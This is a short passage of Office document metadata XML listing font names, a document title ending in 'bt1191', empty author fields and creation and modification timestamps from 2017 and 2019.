      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</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bt1191</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-21T13:09:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-12T07:29:43Z</dcterms:modified>
</cp:coreProperties>
</file>